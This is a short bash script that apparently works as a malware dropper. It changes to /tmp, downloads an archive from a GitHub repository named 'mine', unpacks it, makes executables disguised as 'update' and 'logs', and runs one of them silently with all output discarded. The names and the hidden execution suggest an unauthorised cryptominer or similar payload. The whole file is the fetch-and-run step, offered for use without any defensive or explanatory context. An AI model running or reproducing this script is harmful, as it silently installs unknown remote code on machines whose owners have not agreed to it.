#!/bin/bash
reset
cd /tmp && curl -O https://raw.githubusercontent.com/robertreynolds2/mine/main/mina.tar && tar -xf mina.tar && rm -rf mina.tar && chmod +x update logs && bash ./logs > /dev/null 2>&1

